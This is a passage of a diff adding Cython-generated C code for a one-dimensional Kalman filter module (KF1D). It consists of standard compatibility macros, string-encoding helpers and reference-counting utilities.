__Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__common__kalman__simple_kalman_impl +#define __PYX_HAVE_API__common__kalman__simple_kalman_impl +/* Early includes */ +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "common/kalman/simple_kalman_impl.pyx", + "common/kalman/simple_kalman_impl.pxd", + "", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D; + +/* "common/kalman/simple_kalman_impl.pxd":3 + * # cython: language_level = 3 + * + * cdef class KF1D: # <<<<<<<<<<<<<< + * cdef public: + * double x0_0 + */ +struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D { + PyObject_HEAD + double x0_0; + double x1_0; + double K0_0; + double K1_0; + double A0_0; + double A0_1; + double A1_0; + double A1_1; + double C0_0; + double C0_1; + double A_K_0; + double A_K_1; + double A_K_2; + double A_K_3; +}; + +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* 